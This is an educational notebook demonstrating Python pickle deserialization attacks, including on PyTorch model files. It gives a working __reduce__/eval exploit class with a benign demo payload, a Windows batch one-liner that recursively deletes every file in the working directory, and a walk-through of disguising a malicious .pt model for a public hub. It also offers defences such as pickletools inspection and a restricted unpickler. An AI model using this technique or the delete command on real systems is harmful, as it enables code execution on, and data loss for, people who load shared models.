# The _Pickle_ Exploit

Return to the [castle](https://github.com/Nkluge-correa/teeny-tiny_castle).

**[Python](https://www.python.org/) is one of the main programming languages used for _data science_ and _machine learning_. As such, developers using this language need to be aware of the kinds of vulnerabilities that Python presents.**

**In this notebook, we will exploit a vulnerability in the Python _[Pickle](https://docs.python.org/3/library/pickle.html#)_ module, used for serializing and de-serializing Python object structures.**

- _The process of converting Python objects (lists, dicts, etc.) into byte streams (0s and 1s) is called pickling. And here is where our problems start: **almost anything can be turned into a pickle**..._
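As a minimal sketch of what pickling looks like in practice (the `record` dictionary is an illustrative value, not something from this notebook), a round trip through `pickle.dumps` and `pickle.loads` might look like this:

```python
import pickle

# Illustrative object: any mix of built-in containers works the same way.
record = {"name": "teeny-tiny", "weights": [0.1, 0.2], "nested": ("a", 1)}

blob = pickle.dumps(record)    # object -> bytes
restored = pickle.loads(blob)  # bytes -> object (only do this with trusted data)

print(type(blob).__name__, restored == record)
```

The byte string in `blob` is what ends up in a pickle file on disk.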

![pickle](https://media3.giphy.com/media/JmPenP1svctdfDCEHi/giphy.gif)

**Let's first define a malicious Python payload that we would like to run. Note that _anything that Python can execute can be made into a payload_ (e.g., batch/shell code). For example:**

```python

import os
os.system('''for /F "delims=" %%i in ('dir /b') do (rmdir "%%i" /s/q || del "%%i" /s/q)''')

```

**This payload will delete all files and directories in the current working directory of some poor soul (the command uses Windows batch syntax). But let's do something more Pythonic, and less evil.**


```python
def foo_u():
    import os
    for i in range(1, 11):
        os.mkdir(f'{"HA" * i}')

    import webbrowser
    webbrowser.open("https://github.com/Nkluge-correa/teeny-tiny_castle")

    import sys
    del sys.modules["os"]
    del sys.modules["webbrowser"]
```


**This function will (like the example "malware" used in our notebook on malware detection) create a series of ten directories named "HA", "HAHA", and so on, and open your browser to the [teeny-tiny_castle](https://github.com/Nkluge-correa/teeny-tiny_castle) repository. This could be turned into something much more harmful, but you should never create malicious code to be used against others.**

**Now, let's transform this function into a string, which we will later inject into a pickle file. For this we can use the `inspect` module and some of its utilities.**


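```python
import inspect

# Turn the body of a Python function into a single string

source = inspect.getsourcelines(foo_u)[0]  # list of source lines, each ending in "\n"
source = source[1:]                        # drop the `def foo_u():` line
find_indent = len(source[0]) - len(source[0].lstrip())
source = [line[find_indent:] for line in source]  # strip the body's indentation
# Each line already ends with a newline, so joining with "\n" leaves extra
# blank lines in the result; they are harmless when the code is executed.
inject_src = "\n".join(source)

# Now, something like exec(inject_src) will run this payload
# (exec executes Python source code passed to it as a string)

print(inject_src)
```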


```text
import os

for i in range(1, 11):

    os.mkdir(f'{"HA" * i}')


import webbrowser

webbrowser.open("https://github.com/Nkluge-correa/teeny-tiny_castle")


import sys

del sys.modules["os"]

del sys.modules["webbrowser"]
```


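As a side note, the "drop the `def` line and strip the indentation" step can also be sketched with `textwrap.dedent`. The example below is only an illustration under stated assumptions: `source_lines` is a hypothetical stand-in for what `inspect.getsourcelines` returns, and `greet` is not a function from this notebook.

```python
import textwrap

# Hypothetical stand-in for the list returned by inspect.getsourcelines():
# every line keeps its original indentation and its trailing newline.
source_lines = [
    "def greet():\n",
    "    name = 'world'\n",
    "    message = f'hello {name}'\n",
]

# Drop the `def` line, glue the body together, and remove the common indent.
# Joining with "" (not "\n") avoids doubling the newlines.
body = textwrap.dedent("".join(source_lines[1:]))

namespace = {}
exec(body, namespace)  # the body now runs as top-level code
print(namespace["message"])
```

Because the body is executed as top-level code, any imports it needs have to live inside the function body, which is why `foo_u` imports its modules locally.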

**The vulnerability of the pickle module poses a risk to ML engineers and practitioners because [PyTorch](https://pytorch.org/), and libraries built upon it (e.g., [HuggingFace](https://huggingface.co/)), [use pickle to save and load serialized objects (models) to and from disk](https://pytorch.org/docs/master/generated/torch.load.html).**

**This vulnerability is made explicit in both the `pickle` module documentation:**

> [Warning](https://docs.python.org/3/library/pickle.html): The `pickle` module **is not secure**. Only unpickle data you trust. It is possible to construct malicious pickle data which will **execute arbitrary code during unpickling**. Never unpickle data that could have come from an untrusted source, or that could have been tampered with.

And in the `PyTorch` documentation:

> [`torch.load()`](https://pytorch.org/docs/master/generated/torch.load.html#torch.load "torch.load") uses `pickle` module implicitly, which is known to be insecure. It is possible to construct malicious pickle data which will execute arbitrary code during unpickling. Never load data that could have come from an untrusted source, or that could have been tampered with. **Only load data you trust**.

**As a preventive measure, we can inspect pickle objects with the `pickletools` module.**


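```python
import os
import pickle
import pickletools

with open('pickle', 'wb') as handle:
    pickle.dump(inject_src, handle, protocol=pickle.HIGHEST_PROTOCOL)

# Pickle inspection from the command line.
# `python -m pickletools` disassembles the file without loading it, whereas
# `python -m pickle` unpickles the file in order to display its contents.
os.popen('python -m pickletools pickle').read()

# or, directly from Python

my_pickle = pickle.dumps(inject_src)

pickletools.dis(my_pickle)
```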


```text
    0: \x80 PROTO      4
    2: \x95 FRAME      225
   11: \x8c SHORT_BINUNICODE 'import os\n\nfor i in range(1, 11):\n\n    os.mkdir(f\'{"HA" * i}\')\n\n\nimport webbrowser\n\nwebbrowser.open("https://github.com/Nkluge-correa/teeny-tiny_castle")\n\n\nimport sys\n\ndel sys.modules["os"]\n\ndel sys.modules["webbrowser"]\n'
  234: \x94 MEMOIZE    (as 0)
  235: .    STOP
highest protocol among opcodes = 4
```


**Here we can see the contents of this pickle file. But a string alone cannot execute code. We need something that will _execute_ the contents of this string when a pickle file is loaded.**
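This kind of inspection can be partly automated. The sketch below walks the opcode stream with `pickletools.genops` and reports opcodes that can import or call objects during unpickling. The helper name `suspicious_opcodes` and the `SUSPICIOUS` set are assumptions made for illustration, and legitimate pickles of class instances also contain these opcodes, so a hit is a reason to look closer rather than proof of an attack.

```python
import pickle
import pickletools

# Opcodes that can import an object or call one while a pickle is loaded.
SUSPICIOUS = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX"}


def suspicious_opcodes(data: bytes) -> list[str]:
    """Return the names of risky opcodes in `data` without unpickling it."""
    return [op.name for op, _arg, _pos in pickletools.genops(data) if op.name in SUSPICIOUS]


# A plain string carries no import or call opcodes ...
print(suspicious_opcodes(pickle.dumps("import os")))

# ... while a pickled reference to a function needs a global lookup.
print(suspicious_opcodes(pickle.dumps(len)))
```

Since `genops` only parses the byte stream, running this scan does not execute anything stored in the pickle.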

**`pickle` allows you to define custom pickling behavior for your class instances. Implementing the `__reduce__` method is exactly what we need to get code execution.**

> The `__reduce__()` method takes no argument and shall return either a string or preferably a tuple (the returned object is often referred to as the “reduce value”). […] When a tuple is returned, it must be between two and six items long. Optional items can either be omitted, or None can be provided as their value. The semantics of each item are in order: (1) a callable object that will be called to create the initial version of the object; (2) a tuple of arguments for the callable object (an empty tuple must be given if the callable does not accept any argument). […]

**Thus, by implementing `__reduce__` in a class whose instances we are going to pickle, we can give the pickling process a callable plus some arguments to run. While this is intended for reconstructing objects, we can abuse it to get our own code executed.**
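A harmless sketch makes the mechanism visible. The class name `Sneaky` is hypothetical; its `__reduce__` asks the unpickler to call the built-in `len` on a string, so what comes back from `pickle.loads` is the result of that call, not a `Sneaky` instance.

```python
import pickle


class Sneaky:
    """Hypothetical class whose pickle says: call len("hello") on load."""

    def __reduce__(self):
        # (callable, args): the unpickler calls callable(*args) at load time.
        return len, ("hello",)


blob = pickle.dumps(Sneaky())  # nothing is called yet, only recorded
restored = pickle.loads(blob)  # len("hello") is called here

print(type(restored).__name__, restored)
```

Swapping `len` for a callable such as `eval` or `os.system` is all it takes to turn this into code execution.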

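**Here we create a `dict` subclass that takes a string (our payload) plus the dictionary entries as keyword arguments. Its `__reduce__` method returns `eval` as the callable, together with a string that runs our payload through `exec` and then evaluates to an empty dictionary. The fifth element of the reduce value, an iterator over the dictionary's items, refills that dictionary when the pickle is loaded.**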


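```python
class EXPLOIT(dict):

    def __init__(self, inject_src: str, **kwargs):

        super().__init__(**kwargs)
        self._inject_src = inject_src

    def __reduce__(self):
        # Reduce value: (callable, args, state, list items, dict items).
        # On load, eval(...) runs the payload through exec, which returns None,
        # so the expression evaluates to an empty dict that is then refilled
        # with the original key-value pairs.
        return eval, (f"exec('''{self._inject_src}''') or dict()",), None, None, iter(self.items())
```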


**Through this trickery, we can save our executable payload without activating it in the process. When we inspect the saved object, we see a string of code inside an `exec` call. This code will be executed the moment we load the object.**

**Note: _the dictionary will still be intact after this process, so you can save a useful model that works when loaded, but that executes some malicious code in the background while it is being loaded. Below, we create the simplest linear model as an example_.**
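To watch both effects at once without any real payload, here is a minimal sketch. `HarmlessDemo` and the `PICKLE_DEMO` environment variable are hypothetical names chosen for illustration: the embedded code only sets that variable, and the loaded object should come back as a plain dictionary with its entries intact.

```python
import os
import pickle


class HarmlessDemo(dict):
    """Hypothetical stand-in for EXPLOIT with a fixed, benign payload."""

    def __reduce__(self):
        # exec(...) returns None, so `None or dict()` evaluates to an empty dict.
        payload = '''exec("import os; os.environ['PICKLE_DEMO'] = 'ran'") or dict()'''
        # The fifth item refills that empty dict with the original entries.
        return eval, (payload,), None, None, iter(self.items())


blob = pickle.dumps(HarmlessDemo(w=1.0076, b=0.1234))  # payload is stored, not run
os.environ.pop("PICKLE_DEMO", None)                    # make sure the marker is unset

loaded = pickle.loads(blob)                            # payload runs during this call

print(type(loaded).__name__, loaded, os.environ.get("PICKLE_DEMO"))
```

The caller only ever sees an ordinary dictionary; the side effect is the sole trace that something else ran.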


```python
import pickle
import pickletools

my_dict = {'model': 'my_model', 'w': 1.0076, 'b': 0.1234}


with open('bad_pickle', 'wb') as handle:
    pickle.dump(EXPLOIT(inject_src, **my_dict), handle,
                protocol=pickle.HIGHEST_PROTOCOL)


my_bad_pickle = pickle.dumps(EXPLOIT(inject_src, **my_dict))

pickletools.dis(my_bad_pickle)
```


```text
    0: \x80 PROTO      4
    2: \x95 FRAME      318
   11: \x8c SHORT_BINUNICODE 'builtins'
   21: \x94 MEMOIZE    (as 0)
   22: \x8c SHORT_BINUNICODE 'eval'
   28: \x94 MEMOIZE    (as 1)
   29: \x93 STACK_GLOBAL
   30: \x94 MEMOIZE    (as 2)
   31: \x8c SHORT_BINUNICODE 'exec(\'\'\'import os\n\nfor i in range(1, 11):\n\n    os.mkdir(f\'{"HA" * i}\')\n\n\nimport webbrowser\n\nwebbrowser.open("https://github.com/Nkluge-correa/teeny-tiny_castle")\n\n\nimport sys\n\ndel sys.modules["os"]\n\ndel sys.modules["webbrowser"]\n\'\'\') or dict()'
  276: \x94 MEMOIZE    (as 3)
  277: \x85 TUPLE1
  278: \x94 MEMOIZE    (as 4)
  279: R    REDUCE
  280: \x94 MEMOIZE    (as 5)
  281: (    MARK
  282: \x8c     SHORT_BINUNICODE 'model'
  289: \x94     MEMOIZE    (as 6)
  290: \x8c     SHORT_BINUNICODE 'my_model'
  300: \x94     MEMOIZE    (as 7)
  301: \x8c     SHORT_BINUNICODE 'w'
  304: \x94     MEMOIZE    (as 8)
  305: G        BINFLOAT   1.0076
  314: \x8c     SHORT_BINUNICODE 'b'
  317: \x94     M
```

**⚠️Warning! ONLY EXECUTE THE NEXT CELL IF YOU WANT TO EXECUTE THE PAYLOAD (THE ONE PROVIDED IN THIS ORIGINAL NOTEBOOK IS HARMLESS).⚠️**


```python
import pickle

import numpy as np
import plotly.graph_objects as go

# Loading the file is what triggers the payload
with open(r"bad_pickle", "rb") as input_file:
    my_dict = pickle.load(input_file)

print(my_dict)

w0 = my_dict['w']
b0 = my_dict['b']

# Noisy samples of a linear function
x = np.random.randn(200)*2
noise = np.random.normal(1, 20, 200)*0.05
y = x + noise

# Predictions of the loaded linear model
model_LR = np.dot(x, w0) + b0

fig = go.Figure(data=go.Scatter(
    x=x, y=y, mode='markers', name='Mystery Function'))
fig.update_layout(template='plotly_dark',
                  title='Loaded Model Still Works!',
                  paper_bgcolor='rgba(0, 0, 0, 0)',
                  plot_bgcolor='rgba(0, 0, 0, 0)')
fig.add_trace(go.Scatter(x=x, y=model_LR,
              name=f'my_model = {round(w0, 4)} * x + {round(b0, 4)}'))


fig.show()
```


```text
{'model': 'my_model', 'w': 1.0076, 'b': 0.1234}
```


**How might this affect ML engineers and practitioners in the field? Platforms like `HuggingFace` democratize ML research by sharing models for many types of tasks. However, nothing prevents an attacker from uploading a model to such a platform (or to a code-sharing platform, e.g., `GitHub`) that contains malicious code to be executed when the model is loaded.**

**Below we create a `.pt` file (a machine learning model saved with PyTorch) that contains nothing but 222,222,222 zeros, plus a malicious payload.**

**A malicious attacker could save such a model (or a totally legitimate model), upload it to a public repository, make a good advertisement for their `ultimate_model_to_rule_all_models`, and hope that curiosity will lure victims into the trap.**


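```python
import torch

# A large tensor of zeros stands in for the "model weights"
junk = torch.zeros(222222222)

model = {
    "ultimate_model_to_rule_all_models": junk,
}

# Wrap the dictionary so that the payload travels with it
ultimate_model = EXPLOIT(inject_src, **model)

torch.save(ultimate_model, 'ultimate_model_to_rule_all_models.pt')
```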


**⚠️Warning! ONLY EXECUTE THE NEXT CELL IF YOU WANT TO EXECUTE THE PAYLOAD (THE ONE PROVIDED IN THIS ORIGINAL NOTEBOOK IS HARMLESS).⚠️**


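```python
# Loading the file triggers the payload.
# On PyTorch versions where torch.load defaults to weights_only=True, this
# call refuses to unpickle arbitrary objects and raises an error instead.
model = torch.load('ultimate_model_to_rule_all_models.pt')

print(model)
```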


```text
{'ultimate_model_to_rule_all_models': tensor([0., 0., 0.,  ..., 0., 0., 0.])}
```


**The moral of the story is that you should take the warnings in the `pickle` and `PyTorch` library documentation seriously.**

> [Warning](https://docs.python.org/3/library/pickle.html): The `pickle` module **is not secure**. Only unpickle data you trust. It is possible to construct malicious pickle data which will **execute arbitrary code during unpickling**.

**As a precaution, one possible security measure is to load models from unverified sources only inside virtual machines. Stay safe folks! 🙃**
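Another line of defense, sketched here along the lines of the "Restricting Globals" recipe in the `pickle` documentation, is to subclass `pickle.Unpickler` and override `find_class` so that only an allow-list of globals can be resolved. The names `RestrictedUnpickler`, `restricted_loads`, `SAFE_BUILTINS` and `CallsEval` are assumptions made for this example, and the allow-list would need to be adapted to the data you actually expect. On the PyTorch side, `torch.load` also accepts a `weights_only` argument that restricts what may be unpickled.

```python
import builtins
import io
import pickle

# Illustrative allow-list: the only globals this unpickler agrees to resolve.
SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the pickle asks for a global such as builtins.eval.
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Like pickle.loads, but refuses globals outside the allow-list."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


class CallsEval:
    """Hypothetical object whose pickle asks the loader to call eval."""

    def __reduce__(self):
        return eval, ("1 + 1",)


# Plain data needs no globals, so it loads normally.
print(restricted_loads(pickle.dumps({"w": 1.0076, "b": 0.1234})))

# A pickle that references eval is rejected before anything is called.
blocked_blob = pickle.dumps(CallsEval())
try:
    restricted_loads(blocked_blob)
except pickle.UnpicklingError as err:
    print("blocked:", err)
```

This does not make untrusted pickles safe in general, since the result is only as good as the allow-list, but it stops the `eval`-based trick used in this notebook.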

